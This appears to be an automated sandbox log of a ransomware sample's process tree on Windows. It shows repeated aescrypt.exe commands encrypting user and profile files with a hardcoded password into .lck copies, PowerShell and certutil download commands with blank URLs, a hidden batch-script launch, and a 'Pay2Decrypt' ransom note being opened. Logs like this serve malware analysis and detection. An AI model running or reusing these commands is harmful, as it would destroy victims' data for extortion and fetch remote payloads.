C:\Windows\system32\attrib.exeattrib +r "ReadRequest.midi.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchStop.ps1.lck" "WatchStop.ps1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "WatchStop.ps1.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFind.mpg.lck" "ConvertFind.mpg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFind.mpg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairBackup.dib.lck" "RepairBackup.dib"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RepairBackup.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompressSuspend.MOD.lck" "CompressSuspend.MOD"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "CompressSuspend.MOD.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideRepair.vsdx.lck" "HideRepair.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "HideRepair.vsdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UndoPush.cab.lck" "UndoPush.cab"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UndoPush.cab.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountLock.mpp.lck" "MountLock.mpp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "MountLock.mpp.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveConnect.M2T.lck" "ReceiveConnect.M2T"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveConnect.M2T.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockEnter.xps.lck" "BlockEnter.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "BlockEnter.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountMeasure.css.lck" "DismountMeasure.css"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "DismountMeasure.css.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRedo.vbe.lck" "ReadRedo.vbe"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ReadRedo.vbe.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditDebug.fon.lck" "EditDebug.fon"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "EditDebug.fon.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearExit.cfg.lck" "ClearExit.cfg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ClearExit.cfg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StopSelect.dotx.lck" "StopSelect.dotx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "StopSelect.dotx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartInitialize.png.lck" "StartInitialize.png"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "StartInitialize.png.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ShowSearch.gif.lck" "ShowSearch.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ShowSearch.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectMove.emf.lck" "ConnectMove.emf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConnectMove.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupExit.gif.lck" "BackupExit.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "BackupExit.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallLock.xps.lck" "InstallLock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InstallLock.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestartSearch.bmp.lck" "RestartSearch.bmp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RestartSearch.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockSearch.svg.lck" "UnblockSearch.svg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnblockSearch.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmAdd.jpeg.lck" "ConfirmAdd.jpeg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmAdd.jpeg.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat4⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt5⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.ini.lck" "ntuser.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "deployment.properties.lck" "deployment.properties"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "deployment.properties.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG1.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT.lck" "NTUSER.DAT"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Admin.contact.lck" "Admin.contact"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Admin.contact.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Pay2Decrypt54.txt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "These.docx.lck" "These.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "These.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Are.docx.lck" "Are.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Are.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Recently.docx.lck" "Recently.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Recently.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Opened.docx.lck" "Opened.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Opened.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Files.docx.lck" "Files.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Files.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugRestart.dot.lck" "DebugRestart.dot"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "DebugRestart.dot.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectSend.dotm.lck" "UnprotectSend.dotm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectSend.dotm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectConnect.rtf.lck" "UnprotectConnect.rtf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectConnect.rtf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectInitialize.pptm.lck" "ProtectInitialize.pptm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ProtectInitialize.pptm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddInvoke.docm.lck" "AddInvoke.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "AddInvoke.docm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RedoConnect.html.lck" "RedoConnect.html"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RedoConnect.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendUnlock.xps.lck" "SendUnlock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SendUnlock.xps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmRestart.vsx.lck" "ConfirmRestart.vsx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmRestart.vsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeEdit.pub.lck" "RevokeEdit.pub"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RevokeEdit.pub.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMeasure.vdx.lck" "NewMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NewMeasure.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockUninstall.pdf.lck" "UnblockUninstall.pdf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnblockUninstall.pdf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TestDismount.vsw.lck" "TestDismount.vsw"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "TestDismount.vsw.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeFind.xlt.lck" "InvokeFind.xlt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeCompress.pptx.lck" "InvokeCompress.pptx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InvokeFind.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +r "InvokeCompress.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchRemove.docm.lck" "SearchRemove.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SearchRemove.docm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeEdit.vdx.lck" "InitializeEdit.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InitializeEdit.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestExport.vsd.lck" "RequestExport.vsd"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RequestExport.vsd.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutGroup.vsdx.lck" "OutGroup.vsdx"3⤵
- Executes dropped EXE
